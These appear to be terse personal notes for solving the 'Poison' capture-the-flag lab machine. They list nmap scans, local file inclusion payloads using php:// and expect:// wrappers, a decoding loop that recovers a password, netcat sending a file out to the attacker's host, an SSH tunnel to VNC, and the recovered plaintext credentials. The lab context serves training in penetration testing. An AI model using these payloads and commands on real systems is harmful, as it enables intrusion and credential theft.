echo "10.129.1.254 poison.htb" | sudo tee -a /etc/hosts
nmap -sC -sV -O -oA initial 10.129.1.254
nmap -sC -sV -p- -oA full 10.129.1.254
#udp scan
nmap -sU -p- -oA udp 10.129.1.254
rustscan --accessible -a poison.htb -r 1-65535 -- -sT -sV -sC -Pn
Vamos a http://10.129.1.254/browse.php?file=listfiles.php
Vamos a http://10.129.1.254/browse.php?file=pwdbackup.txt
expect://id
php://filter/convert.base64-encode/resource=[file-name]
#!/bin/bash# secret.txt contains encoded text secret=$(<secret.txt)for i in {1..13}; do secret=$(<<<"$secret" base64 --decode) done echo "$secret"
Charix!2#4%6&8(0
ssh charix@poison.htb
nc -lvnp 443
nc 10.10.14.135 443 < secret.zip
Vamos a http://10.129.1.254/browse.php?file=/var/log/http-access.log
ps -auxww | grep vnc
netstat -an | grep LIST
ssh -L 5000:127.0.0.1:5901 charix@10.129.1.254
netstat -an |grep LIST
https://github.com/jeroennijhof/vncpwd $ ./vncpwd ../secret Password: VNCP@$$!